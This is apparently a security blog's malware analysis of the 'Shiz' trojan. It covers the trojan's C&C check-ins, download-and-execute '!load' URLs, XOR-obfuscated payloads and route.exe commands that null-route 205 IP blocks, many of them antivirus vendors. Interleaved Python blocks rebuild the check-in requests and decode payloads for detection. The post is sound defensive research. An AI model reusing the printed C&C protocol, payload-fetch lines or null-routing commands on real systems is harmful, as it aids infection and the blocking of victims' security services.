Shiz and Rohimafo: Malware Cousins

Over the course of the last few weeks, our malware sandboxes have analyzed several interesting specimens whose malicious activity includes making significant modifications to the routing table on the victim host. The effect of these changes is to null-route a large number of /24 IP blocks, one of which is assigned to the U.S. Department of Justice.

As usual, the malicious activity begins with running an initial dropper executable. This dropper immediately copies itself verbatim into the Windows system directory under an (apparently) randomly generated file name; examples include 5b8388e0.exe, 593a1edf.exe, and d4f11d84.exe.

The malware then adds an entry under the following Registry key so that the installed copy of itself is launched each time the machine restarts:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

It then launches the installed copy of itself and exits; as usual, this second process deletes the original sample from the file system. The dropped malware then injects code into an svchost.exe process and makes an initial network connection to its C&C server. This connection is an HTTP GET request to a PHP script with two parameters, such as:

http://193.105.XX.YY/knock.php?n=D01DBA80&s=seller-01

We have always observed the same DWORD value for the first parameter (n), but have seen at least six different values for the "seller ID" string (s), including:

seller-01
seller-15
seller-23
seller-25
seller-28

and even, in some dropper samples analyzed back in May 2010:

SELLER_ID_TO_BE_HEREPADDINGPADDINGPADDING [...truncated...]

It is noteworthy that there is no User-Agent provided in this request; in fact, the only HTTP header field present at all is the “Host:” field.

The response from the C&C server included headers indicating it was powered by Apache/2 with PHP version 5.2.13. The response body is a short plain-text configuration file; a representative example is below:

!config
borgherres.com
biologyfozzie.com
b1642ckt.com
7200
!load !68 http://blachowicz.com/ipybnknatrcsae.php?id=1&magic=280736572
7200

In some cases, but not always, the first domain name in the “!config” section is the same as the C&C domain.

The “!load” section contains a URL to download and execute.  In our observations, this URL always contains a randomly-named PHP script with two parameters: an “id” parameter that is always set to 1, and a “magic” parameter that contains a (seemingly) random 9-digit number.  Other representative examples of load commands include:

!load !67 http://b00ger01.com/zt6bgzqn6ww7mz0.php?id=1&magic=866125628
!load !66 http://b0000c454d.com/Hl5OjvG4dRIqx2Y.php?id=1&magic=302293400

The meaning of the numerical "7200" values is not known; perhaps it indicates the number of seconds to wait before checking in again with the C&C server. We have also observed the value 4500 instead of 7200 in some cases.

Upon receipt of the load command, the malware makes another HTTP GET request to the first C&C listed in the aforementioned "!config" section. This C&C is often the same one it initially contacted, but sometimes the acknowledgment goes to a different C&C hostname specified in the "!config". Again, only a single "Host:" HTTP header is included in this request. The response headers from the download server also indicate the same web server software as the initial C&C: Apache/2 with PHP 5.2.13.

Although the download server's response header claims the content is HTML, in actuality it is a large (100KB or more) block of raw binary data. As it turns out, the downloaded data is a new executable file that has been weakly obfuscated by XORing against the DWORD 0xA0A0A0A0 (since every byte of that key is 0xA0, this is equivalent to XORing each byte of the file with 0xA0, so alignment does not matter). After the download completes, the malware sends an acknowledgment to the C&C: another HTTP GET request to the original URL, with a third GET parameter appended indicating that the "!load" command succeeded:

http://193.105.207.XXX/knock.php?n=D01DBA80&s=seller-01&r=68:load_success;

Note that the request value of "68" was included within the load command as "!68". Over the course of several days we have observed this number slowly increment from 66 to 67 to 68, which suggests it could be a revision number of some kind. The C&C responds to this acknowledgment with headers but no content bytes.
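The check-in exchange described above, modeled in Python as an added example (this is not code from the post or from the malware): it builds the Host-only knock request, parses the bang-section response, pulls the "!load" revision, URL and magic value out of it, and builds the load_success acknowledgment. The same section parser handles the "!new_config" reply from the second C&C that appears later in the post. The host name "cnc.example" is a hypothetical stand-in for the redacted 193.105.XX.YY; the victim DWORD, seller ID and response text are the values quoted above, copied into constructed sample strings. The last function is a network-side check of the kind the post's requests invite: script name plus the absence of every header except Host.

```python
"""Shiz C&C check-in exchange reconstructed from the observed traffic.
Added example; cnc.example is hypothetical, the rest are the post's values."""
import re
from urllib.parse import parse_qs, urlsplit

CNC_HOST = "cnc.example"  # hypothetical: the post redacts the real address

# Constructed copies of the representative responses quoted in the post.
SAMPLE_RESPONSE = (
    "!config\nborgherres.com\nbiologyfozzie.com\nb1642ckt.com\n7200\n"
    "!load !68 http://blachowicz.com/ipybnknatrcsae.php?id=1&magic=280736572\n7200\n"
)
SAMPLE_NEW_CONFIG = (
    "!new_config\nbesprutaness.com\nbuffeter.com\nbjerkeseth.com/iOsVnczZv5NIYH8.php\n"
)


def build_knock_request(host, n="D01DBA80", seller="seller-01", path="/knock.php"):
    """Raw GET exactly as observed: two query parameters and a lone Host: header.
    Built as a literal so nothing percent-encodes what the malware sends verbatim."""
    return f"GET {path}?n={n}&s={seller} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()


def build_ack_request(host, n, seller, revision, path="/knock.php"):
    """Acknowledgment: the knock URL plus r=<rev>:load_success; (the trailing
    semicolon is part of the observed value)."""
    return (f"GET {path}?n={n}&s={seller}&r={revision}:load_success; HTTP/1.1\r\n"
            f"Host: {host}\r\n\r\n").encode()


def parse_cnc_response(text):
    """Parse the bang-section format: a line beginning with '!' opens a section
    named by that token; the remaining tokens on that line and every following
    non-'!' line are the section's arguments.  Covers !config/!load and the
    !new_config reply alike."""
    sections = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("!"):
            name, *rest = line.split()
            sections.append({"name": name[1:], "args": rest})
        elif sections:
            sections[-1]["args"].append(line)
        else:
            raise ValueError(f"data before first section: {line!r}")
    return sections


def extract_load(sections):
    """Return (revision, url, magic, interval) from a '!load !NN url' section, or
    None.  The trailing bare number (7200/4500) is carried as the presumed
    check-in interval; the post does not confirm that meaning."""
    for sec in sections:
        args = sec["args"]
        if sec["name"] != "load" or len(args) < 2 or not args[0].startswith("!"):
            continue
        revision = int(args[0][1:])
        url = args[1]
        magic = parse_qs(urlsplit(url).query).get("magic", [None])[0]
        interval = int(args[-1]) if len(args) > 2 and args[-1].isdigit() else None
        return revision, url, magic, interval
    return None


CHECKIN_PATH = re.compile(rb"^GET /(?:knock|knok|socks)\.php\?")


def looks_like_shiz_checkin(request):
    """Network-side check: one of the three script names and no header other
    than Host:.  Real clients send at least User-Agent, so the header-set test
    keeps a generic '.php?' pattern from firing on ordinary traffic."""
    head = request.split(b"\r\n\r\n", 1)[0]
    request_line, *headers = head.split(b"\r\n")
    if not CHECKIN_PATH.match(request_line):
        return False
    names = {h.split(b":", 1)[0].strip().lower() for h in headers if h.strip()}
    return names == {b"host"}
```

The header-set test is the part worth carrying into an IDS rule: matching only on knock.php would also catch any site that happens to use that file name, whereas "Host is the only header" is unusual enough for a browser-era client to be a strong signal on its own.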

Once the downloaded data is written to the file system, it is XORed against 0xA0A0A0A0 to restore its original executable form and then executed. The file name follows a pattern exemplified by the following representative samples:

C:\WINDOWS\TEMP\ntE808.tmp.exe
C:\WINDOWS\TEMP\ntA2EC.tmp.exe
C:\WINDOWS\TEMP\ntEBEB.tmp.exe

Once executed, the dropped malware moves itself from C:\Windows\TEMP to C:\Windows\System32 under a randomly generated new file name, such as:

uwlfoh.exe
xnkhpi.exe
eiqchz.exe

It then restarts itself and begins making permanent modifications to the victim computer's routing table in order to block access to a list of 205 separate /24 IP blocks. The list of blocks to null-route is embedded (in obfuscated form) in the downloaded executable; although a strings analysis of the static binary yielded no IP addresses, a memory dump of the running process contained a list of 205 ASCII strings for the blocks to be null-routed.

The malware proceeds down this list and invokes the Windows route.exe command twice for each IP block:

route.exe -p add 128.111.48.0 mask 255.255.255.0 172.XX.YY.0
route.exe -p add 128.111.48.0 mask 255.255.255.0 0.0.0.255

In our experiments on a Windows XP box, the second route.exe command fails because the specified gateway (0.0.0.255) is invalid, but the first command succeeds and has the effect of null-routing the target IP block (128.111.48.0/24 in this case, assigned to UC Santa Barbara) because no host exists with IP address 172.XX.YY.0. Note that the nonexistent gateway appears to be generated dynamically from the victim machine's IP (which in the above case was the RFC 1918 address 172.XX.YY.ZZ) by setting the host octet to zero, which yields the victim subnet's network address rather than any reachable host.
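A detection for this step, written as an added example in Python (not code from the post): it runs over a constructed list of process command lines of the kind a process-creation log supplies, flags "route add" invocations whose gateway cannot forward traffic, folds the two attempts per block into one finding, and emits the route.exe cleanup commands. The victim address 172.16.5.77 is a hypothetical RFC 1918 host standing in for the post's redacted 172.XX.YY.ZZ; the reason strings and the legitimate third route are likewise constructed.

```python
"""Detect and undo the Shiz null-routing routine from process command lines.
Added example; 172.16.5.77 and the sample lines are constructed."""
import ipaddress
import re

ROUTE_ADD = re.compile(
    r"\broute(?:\.exe)?\s+(-p\s+)?add\s+(\S+)\s+mask\s+(\S+)\s+(\S+)", re.IGNORECASE)

VICTIM_IP = "172.16.5.77"  # hypothetical victim address

# Constructed sample: the two commands quoted in the post (victim subnet filled
# in with the hypothetical address) plus one legitimate route for contrast.
SAMPLE_CMDLINES = [
    "route.exe -p add 128.111.48.0 mask 255.255.255.0 172.16.5.0",
    "route.exe -p add 128.111.48.0 mask 255.255.255.0 0.0.0.255",
    "route -p add 10.20.0.0 mask 255.255.0.0 172.16.5.1",
]

R_NET_ADDR = "gateway is the local subnet's network address; no host answers ARP for it"
R_ZERO_OCTET = "gateway host octet is 0"
R_ZERO_NET = "gateway in 0.0.0.0/8 is never valid (route.exe rejects it)"
R_PERSIST = "persistent (-p) /24 route survives reboot"


def bogus_gateway_for(victim_ip):
    """The gateway Shiz derives from the victim's own address: host octet set to
    zero, i.e. the /24 network address, which the stack can never resolve."""
    return str(ipaddress.ip_network(f"{victim_ip}/24", strict=False).network_address)


def parse_route_add(cmdline):
    """Pick apart 'route [-p] add DEST mask MASK GATEWAY'; None if not a route add."""
    m = ROUTE_ADD.search(cmdline)
    if not m:
        return None
    persistent, dest, mask, gateway = m.groups()
    return {"persistent": bool(persistent), "dest": dest, "mask": mask, "gateway": gateway}


def suspicious_reasons(route, victim_ip):
    """Why this route add looks like a deliberate black hole (empty if benign)."""
    try:
        gw = ipaddress.ip_address(route["gateway"])
    except ValueError:
        return ["gateway is not an IP address"]
    reasons = []
    if route["gateway"] == bogus_gateway_for(victim_ip):
        reasons.append(R_NET_ADDR)
    if gw.packed[-1] == 0:
        reasons.append(R_ZERO_OCTET)
    if gw in ipaddress.ip_network("0.0.0.0/8"):
        reasons.append(R_ZERO_NET)
    if reasons and route["persistent"] and route["mask"] == "255.255.255.0":
        reasons.append(R_PERSIST)
    return reasons


def find_null_routes(cmdlines, victim_ip):
    """Aggregate per destination: Shiz issues two adds per block (one succeeds,
    one fails), and both should land in a single finding."""
    hits = {}
    for line in cmdlines:
        route = parse_route_add(line)
        if route is None:
            continue
        reasons = suspicious_reasons(route, victim_ip)
        if not reasons:
            continue
        entry = hits.setdefault(route["dest"], {"mask": route["mask"], "reasons": set()})
        entry["reasons"].update(reasons)
    return hits


def cleanup_commands(hits):
    """route.exe syntax to remove the bogus routes.  After running these, confirm
    nothing is left under HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\
    Parameters\\PersistentRoutes, where -p routes are stored."""
    return [f"route delete {dest} mask {e['mask']}" for dest, e in sorted(hits.items())]
```

The ".0 gateway" test works without knowing the victim address, which matters when the log comes from a fleet rather than one sandbox; the exact-match against bogus_gateway_for is the higher-confidence version for a host whose address is known. A list of 205 such adds in under a minute from a process living in System32 is the behavioral signature, independent of which /24s are targeted.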

The complete list of IP blocks that the malware attempts to null-route, along with their associated network names and country codes, is as follows:

AT    128.130.56.0    TECHNISCHE UNIVERSITAT WIEN
AT    128.130.60.0    TECHNISCHE UNIVERSITAT WIEN
BY    195.137.160.0    TUT.BY
CH    193.17.85.0    NINE INTERNET SOLUTIONS AG SWITZERLAND
CZ    212.67.88.0    TARIO OF NEW YORK
CZ    89.202.157.0    COLGATE-PALMOLIVE CESKA REPUBLIKA SPOL. S R.O
CZ    90.183.101.0    NETCENTRUM
DE    188.40.74.0    NETWORK ADDRESS
DE    188.93.8.0    INFRASTRUCTURE
DE    193.24.237.0    INSOFT EDV-SYSTEME GMBH BERLIN
DE    194.112.106.0    CABLE & WIRELESS TELECOMMUNICATION SERVICES GMBH
DE    213.198.89.0    NTT/VERIO EUROPE
DE    62.146.210.0    AVIRA GMBH
DE    62.146.66.0    SKYLIME GBR
DE    62.67.184.0    GRID-SERVICE-GMBH
DE    62.75.163.0    VSERVER - VIRTUAL DEDICATED SERVER-HOSTING
DE    62.75.216.0    SERVER4YOU DEDICATED SERVER HOSTING
DE    78.47.87.0    HETZNER ONLINE AG
DE    80.153.193.0    DEUTSCHE TELEKOM AG
DE    80.190.130.0    HOLTZBRINCK ONLINE SERVICES GMBH
DE    80.190.154.0    AVIRA GMBH
DE    80.237.132.0    HOSTEUROPE GMBH
DE    81.24.35.0    AIXTRANET HERZOGENRATH
DE    82.165.103.0    1&1 INTERNET AG
DE    82.98.86.0    SEDO DOMAIN PARKING
DE    85.214.106.0    STRATO RECHENZENTRUM BERLIN
DE    85.255.19.0    ELEMENT5 AG - A DIGITALRIVER COMPANY
DE    87.106.242.0    1&1 INTERNET AG
DE    87.106.254.0    1&1 INTERNET AG
DE    87.230.79.0    HOSTEUROPE GMBH
EE    195.222.17.0    DIAPOL GRANITE OY
EE    212.47.219.0    MODERA CONSULTING O
ES    195.55.72.0    DIRECCION GENERAL DE TRAFICO
ES    212.8.79.0    GIPUZKOA EMPLOYERS ASSOCIATION
ES    62.14.249.0    IP ADDRESSES FOR JAZZTELBONE CLIENTS
FI    193.110.109.0    F-SECURE OYJ
FI    193.66.251.0    F-SECURE
FR    194.206.126.0    NORDNET SA
FR    195.146.235.0    NORDNET
FR    195.210.42.0    MFX-BORDEAUX
FR    83.202.175.0    FRANCE TELECOM
FR    85.31.222.0    RDMEDIAS
FR    91.121.97.0    OVH SAS
FR    94.23.206.0    OVH SAS
GR    139.91.222.0    FOUNDATION OF RESEARCH AND TECHNOLOGY HELLAS
HU    195.70.37.0    INTERWARE INC
IE    193.1.193.0    NETWORK FOR FTP.HEANET.IE SERVICES
IE    78.137.164.0    LETSHOST
IE    79.125.5.0    AMAZON WEB SERVICES ELASTIC COMPUTE CLOUD EC2 EU
IL    199.203.243.0    ELRON TECHNOLOGIES
IS    213.220.100.0    FRIDRIK SKULASON HF
JP    150.70.93.0    JAPAN NETWORK INFORMATION CENTER
NL    192.150.94.0    IP-EEND
NL    194.109.142.0    XS4ALL INTERNET BV
NL    213.133.34.0    IS INTERNED SERVICES
NL    217.170.21.0    KDIS
NL    85.12.57.0    EUROACCESS
NL    85.17.210.0    LEASEWEB
NO    193.69.114.0    NORMAN DATA DEFENCE SYSTEMS AS LYSAKER
NO    193.71.68.0    NORMAN DATA DEFENCE SYSTEMS AS LYSAKER
NO    87.238.48.0    LINPRO AS
PH    203.160.188.0    PHILIPPINE TELEGRAPH AND TELEPHONE CORPORATION
RO    80.86.107.0    INFRA-AW
RU    195.2.240.0    PETERSBURG INTERNET NETWORK LLC
RU    212.59.118.0    IO-HOSTS LTD
RU    217.106.234.0    MASTAK-TELECOM
RU    217.16.16.0    MASTERHOST.RU IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    217.174.103.0    HTTP://WWW.NIKAMOTORS.RU
RU    62.213.110.0    KASPERSKY LAB
RU    69.20.104.0    CHRONOPAY B.V
RU    78.108.86.0    SAINT-PETERSBURG DEPARTMENT MAJORDOMO LLC
RU    81.176.230.0    KASPERSKY LABS
RU    81.176.66.0    RTCOMM.RU NETWORK
RU    81.176.67.0    RTCOMM.RU NETWORK
RU    81.177.31.0    ESERVER.RU - HOSTING OPERATOR
RU    82.151.107.0    JSC CENTRAL TELECOMMUNICATION COMPANY BRANCH BELSVYAZ
RU    83.102.130.0    CORBINA TELECOM
RU    83.222.23.0    .MASTERHOST
RU    83.222.31.0    MASTERHOST VPS SERVICES
RU    87.242.72.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    87.242.74.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    87.242.75.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    87.242.79.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    89.108.66.0    AGAVA JSC
RU    89.111.176.0    GARANT-PARK-TELECOM LTD
RU    90.156.159.0    MASTERHOST VPS SERVICES
RU    92.53.106.0    TW NETWORK SOLUTION
RU    93.191.13.0    COLOCATION SERVICES
SK    93.184.71.0    VNET A.S
UA    193.193.194.0    LUCKY NET (COLLOCATION)
UA    194.0.200.0    FREEHOST UA
UA    194.33.180.0    HOSTPRO LTD
UA    195.64.225.0    ELEKTRONNI VISTI LTD (ELVISTI LTD) KYIV UKRAINE
UA    82.117.238.0    VELTON.TELECOM GPON K12 NETWORK
UK    193.0.6.0    EUROPEAN REGIONAL REGISTRY
UK    212.72.62.0    LEVEL 3 COMMUNICATIONS
UK    213.171.218.0    UK'S LARGEST WEB HOSTING COMPANY
UK    213.31.172.0    SOPHOS
UK    62.189.194.0    APPENSE
UK    83.223.117.0    UK NOC
UK    88.221.119.0    AKAMAI TECHNOLOGIES
UK    89.202.149.0    INTEROUTE COMMUNICATIONS LIMITED
UK    91.199.212.0    COMODO CA LTD
UK    91.209.196.0    COMODO CA LTD
UK    92.123.155.0    AKAMAI TECHNOLOGIES
UK    94.236.0.0    NET MEDIA PLANET IP SPACE
UK    95.140.225.0    LIMELIGHT NETWORKS INC
US    128.111.48.0    UNIVERSITY OF CALIFORNIA SANTA BARBARA
US    141.202.248.0    COMPUTER ASSOCIATES INTERNATIONAL
US    149.101.225.0    US DEPT OF JUSTICE
US    155.35.248.0    COMPUTER ASSOCIATES INTERNATIONAL
US    162.40.10.0    SUSQUEHANNA FIRE
US    165.160.15.0    CORPORATION SERVICE COMPANY
US    166.70.98.0    XMISSION L.C
US    174.120.184.0    THEPLANET.COM INTERNET SERVICES INC
US    174.120.185.0    THEPLANET.COM INTERNET SERVICES INC
US    174.120.186.0    THEPLANET.COM INTERNET SERVICES INC
US    174.133.38.0    THEPLANET.COM INTERNET SERVICES INC
US    18.85.2.0    MASSACHUSETTS INSTITUTE OF TECHNOLOGY
US    198.6.49.0    SYMANTEC CORPORATION
US    204.14.90.0    FLUID HOSTING LLC
US    205.178.145.0    NETWORK SOLUTIONS LLC
US    205.227.136.0    LEVEL 3 COMMUNICATIONS INC
US    206.204.52.0    CONXION CORPORATION
US    207.44.154.0    THEPLANET.COM INTERNET SERVICES INC
US    207.44.254.0    THEPLANET.COM INTERNET SERVICES INC
US    207.46.18.0    MICROSOFT CORP
US    207.46.20.0    MICROSOFT CORP
US    207.46.232.0    MICROSOFT CORP
US    207.66.0.0    LEGISLATIVE COUNCIL SERVICE
US    208.43.44.0    SOFTLAYER TECHNOLOGIES INC
US    208.43.71.0    SOFTLAYER TECHNOLOGIES INC
US    208.79.250.0    DIGITAL RIVER INC
US    209.124.55.0    INTERALAB
US    209.157.69.0    NTT AMERICA INC
US    209.160.22.0    HOPONE INTERNET CORPORATION
US    209.216.46.0    WCP/32POINTS INTERMEDIATE HOLDING COMPANY INC
US    209.51.167.0    BLACKMESH INC
US    209.62.112.0    THEPLANET.COM INTERNET SERVICES INC
US    209.62.68.0    THEPLANET.COM INTERNET SERVICES INC
US    209.87.209.0    CHECK POINT SOFTWARE TECHNOLOGIES INC
US    216.10.192.0    SYMANTEC CORPORATION
US    216.12.145.0    SERVERVAULT CORP
US    216.239.122.0    CNET NETWORKS INC
US    216.246.90.0    HOSTFORWEB INC
US    216.49.88.0    MCAFEE INC
US    216.49.94.0    MCAFEE INC
US    216.55.183.0    CODERO
US    216.99.133.0    TREND MICRO INCORPORATED
US    38.113.1.0    PSINET INC
US    63.85.36.0    WS/AKAMAI TECHNOLOGIES/AKAMAI TECHNOLOGIES
US    64.128.133.0    TW TELECOM HOLDINGS INC
US    64.13.134.0    TITAN NETWORKS
US    64.202.189.0    GODADDY.COM INC
US    64.246.4.0    THEPLANET.COM INTERNET SERVICES INC
US    64.41.142.0    JUSTIA INC
US    64.41.151.0    MCAFEE INC
US    64.66.190.0    HOSTWAY CORPORATION
US    64.78.182.0    VIAWEST
US    65.175.38.0    FREEZE FRAME GRAPHICS
US    65.55.184.0    MICROSOFT CORP
US    65.55.240.0    MICROSOFT CORP
US    66.223.50.0    PEER 1 DEDICATED HOSTING
US    66.249.17.0    NAME INTELLIGENCE INC
US    66.77.70.0    QCC QWEST
US    67.134.208.0    NATIONAL EDUCATION ASSOCIATION
US    67.15.103.0    OUR INTERNET INC
US    67.15.231.0    SLY.TV
US    67.19.34.0    THEPLANET.COM INTERNET SERVICES INC
US    67.192.135.0    ROUNDHOUSE LLC
US    67.225.206.0    LIQUID WEB INC
US    67.227.172.0    LIQUID WEB INC
US    68.177.102.0    SOURCEFIRE INC
US    69.162.79.0    LIMESTONE NETWORKS INC
US    69.18.148.0    INVISION.COM INC
US    69.57.142.0    THEPLANET.COM INTERNET SERVICES INC
US    69.93.226.0    THEPLANET.COM INTERNET SERVICES INC
US    70.84.211.0    THEPLANET.COM INTERNET SERVICES INC
US    72.232.246.0    LAYERED TECHNOLOGIES INC
US    72.3.254.0    RACKSPACE HOSTING
US    72.32.125.0    RACKSPACE HOSTING
US    72.32.149.0    BEORRATECH
US    72.32.70.0    RACKSPACE HOSTING
US    74.125.77.0    GOOGLE INC
US    74.208.158.0    1&1 INTERNET INC
US    74.208.20.0    1&1 INTERNET INC
US    74.50.0.0    LUNAR PAGES
US    74.52.233.0    THEPLANET.COM INTERNET SERVICES INC
US    74.53.201.0    THEPLANET.COM INTERNET SERVICES INC
US    74.53.70.0    THEPLANET.COM INTERNET SERVICES INC
US    74.54.130.0    THEPLANET.COM INTERNET SERVICES INC
US    74.54.139.0    THEPLANET.COM INTERNET SERVICES INC
US    74.54.46.0    THEPLANET.COM INTERNET SERVICES INC
US    74.55.143.0    THEPLANET.COM INTERNET SERVICES INC
US    74.55.40.0    THEPLANET.COM INTERNET SERVICES INC
US    74.55.74.0    THEPLANET.COM INTERNET SERVICES INC
US    74.86.125.0    SOFTLAYER TECHNOLOGIES INC
US    74.86.232.0    CLIENT INTELLECT INC
US    75.125.185.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.189.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.212.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.29.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.43.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.82.0    THEPLANET.COM INTERNET SERVICES INC
US    84.40.30.0    HOSTWAY TPA FL

Upon completion of the null-routing tasks, the malware connects to a new C&C and submits an HTTP GET request to a URL such as:

http://193.105.XX.YY/knok.php?id=SYSTEM!VICTIM!9B88F779&ver=21&up=162&os=XP%20Service%20Pack%202

Note the use of a "knok.php" script instead of the "knock.php" used for the initial C&C. Note also that the malware submits the victim computer's name (VICTIM) along with information about the operating system and service pack level.

This second C&C responds with another configuration-like file, such as:

!new_config
besprutaness.com
buffeter.com
bjerkeseth.com/iOsVnczZv5NIYH8.php

This response prompts the malware to download yet another file from the specified PHP script; the downloaded file is again a new executable obfuscated by XORing against 0xA0A0A0A0, and is saved to the following location:

C:\temp_file_bin

This download server was running slightly older software (Apache and PHP 5.2.12 instead of Apache/2 and PHP 5.2.13 as above).
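Both downloads (the ntXXXX.tmp.exe payload and temp_file_bin) carry the same XOR layer, so one decoder serves both. The following is an added example in Python, not code from the post: it applies the 0xA0A0A0A0 key, shows that the key can be recovered from the "MZ" header by known plaintext rather than assumed, and validates the result as a PE before an unpack script would write it to disk. The payload used here is a constructed minimal MZ/PE header, not one of the real samples.

```python
"""Undo the DWORD-XOR obfuscation on the downloaded executables.
Added example; the payload below is a constructed stand-in, not a real sample."""
import struct

SHIZ_KEY = 0xA0A0A0A0


def xor_with_dword(data, key=SHIZ_KEY):
    """XOR against the little-endian bytes of a repeating 32-bit key.  With
    0xA0A0A0A0 every key byte is 0xA0, so word alignment and endianness cannot
    change the result; the DWORD form only mirrors how the post describes it."""
    key_bytes = struct.pack("<I", key)
    return bytes(b ^ key_bytes[i & 3] for i, b in enumerate(data))


def recover_single_byte_key(blob):
    """Known plaintext: a PE begins with b'MZ'.  If one byte was XORed across the
    file, blob[0]^'M' and blob[1]^'Z' agree; otherwise return None."""
    k0, k1 = blob[0] ^ 0x4D, blob[1] ^ 0x5A
    return k0 if k0 == k1 else None


def is_pe(data):
    """MZ signature plus a 'PE\\0\\0' signature at e_lfanew (the DWORD at 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_download(blob):
    """Recover the key, undo the obfuscation, and refuse anything that does not
    decode to a PE.  Raising is the right failure mode: a download server that
    has started returning real HTML must not be mistaken for a payload."""
    key = recover_single_byte_key(blob)
    if key is None:
        raise ValueError("first two bytes are not a single-byte XOR of 'MZ'")
    decoded = xor_with_dword(blob, key * 0x01010101)  # replicate byte into a DWORD
    if not is_pe(decoded):
        raise ValueError("decoded data has no PE signature")
    return decoded


def build_fake_pe(size=0x200):
    """Constructed stand-in: MZ header, e_lfanew -> 0x80, PE signature there, and
    a run of distinct filler bytes so the XOR visibly scrambles the tail."""
    image = bytearray(size)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)
    image[0x80:0x84] = b"PE\0\0"
    image[0x100:] = bytes(range(size - 0x100))
    return bytes(image)
```

An obfuscated Shiz download therefore starts with the bytes ED FA (0x4D^0xA0, 0x5A^0xA0), which is a usable two-byte signature for the download response on the wire even though the server labels it HTML; the key-recovery step means the same script keeps working if a later variant changes the constant.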

The malware also injects code into various processes, including EXPLORER.EXE and IEXPLORE.EXE; we have studied neither the behavior nor purpose of this injected code.

Finally, the malware opens a listening socket on TCP port 14336 and informs the C&C by sending a final HTTP request to a URL such as:

http://193.105.XX.YY/socks.php?name=SYSTEM!VICTIM!9B88F779&port=14336

We have not verified this via reverse engineering, but it seems reasonable to assume that the intention of the opened port might be to serve as a SOCKS proxy.

The dropped malware uses the following mutex to prevent multiple copies of itself from running simultaneously:

WBEMPROVIDERSTATICMUTEX

Virus detection coverage for the original droppers, as compiled by VirusTotal.com, ranged from 34% to 68% at the time of our analysis, but has improved significantly in the last couple of weeks. Typical detections include:

Backdoor/Win32.Shiz.gen (Antiy-AVL)
Backdoor.Win32.Shiz!IK (Emsisoft)
W32/Shiz!tr.bdr (Fortinet)
Backdoor.Win32.Shiz (Ikarus)
Backdoor.Win32.Shiz.gen (Kaspersky)
Backdoor.Shiz.JJ (VirusBuster)
Trojan:Win32/Meredrop (Microsoft)
W32/Meredrop.FK (Norman)

As for the dropped (null-routing) malware, detection coverage was poor (about 15%) around the time the sample was first studied, but has since improved in many cases over the last few weeks.

Based on these detections, we have begun using the moniker “Shiz” internally for this family.  MD5 hashes and file sizes for the initial dropper samples we’ve seen include:

64ed993299dc40da0822272fd600cf78  (34,816 bytes)
bb9449e02df8d67a6e2e3a60d8f317b6  (40,448 bytes)
527ad0b6464631ff1dc07b5f282c0d7d  (38,400 bytes)

MD5 hashes (after de-XORing) and file sizes for the dropped null-routing malware include:

aa66aea4c2cbc9de17e213d334131699  (130,560 bytes)
3f6cedccf1d37de2b9957c06437017f7  (105,984 bytes)
56ee94a95ab2ecb41be357f414de533c  (107,520 bytes)

Based on our observations, the C&C servers for this family tend to be hosted in Kazakhstan and Ukraine, and the download servers (where the null-routing malware component lives) are hosted in Russia.

In most respects, the behavior of Shiz is very similar to that of another malware family known as Rohimafo, which is described in detail here.

The similarities include the following:

  • The knock.php/knok.php URLs for connecting to the C&C;
  • The null-routing of over 200 /24 IP blocks;
  • The opening of a listening socket (probably a SOCKS proxy);
  • The injection of code into EXPLORER.EXE and IEXPLORE.EXE;
  • Similar modifications to the Registry.

In fact, the 205 IP blocks null-routed by our Shiz samples include the identical 201 blocks null-routed by Rohimafo, plus the following four additions:

EE    195.222.17.0    DIAPOL GRANITE OY
RU    212.59.118.0    IO-HOSTS LTD
RU    81.176.230.0    KASPERSKY LABS
US    74.55.143.0     THEPLANET.COM INTERNET SERVICES INC

Based on these similarities, we have concluded that either Shiz and Rohimafo are essentially the same family of malware, or at the very least that Shiz is a very close descendant and/or variant of Rohimafo.

One Response to “Shiz and Rohimafo: Malware Cousins”

September 17, 2010 at 5:39 pm, Curt Wilson said:

Nice work Jeff. Looks like the malware authors incorporated a list of security company, sandbox, etc. related IPs for null-routing. Speculating that some of the in-the-cloud AV services such as Artemis, Immunet and the like could be temporarily delayed due to this technique once it lands on a box the first time. Nice job and makes for good operational IDS sigs too. @curtw
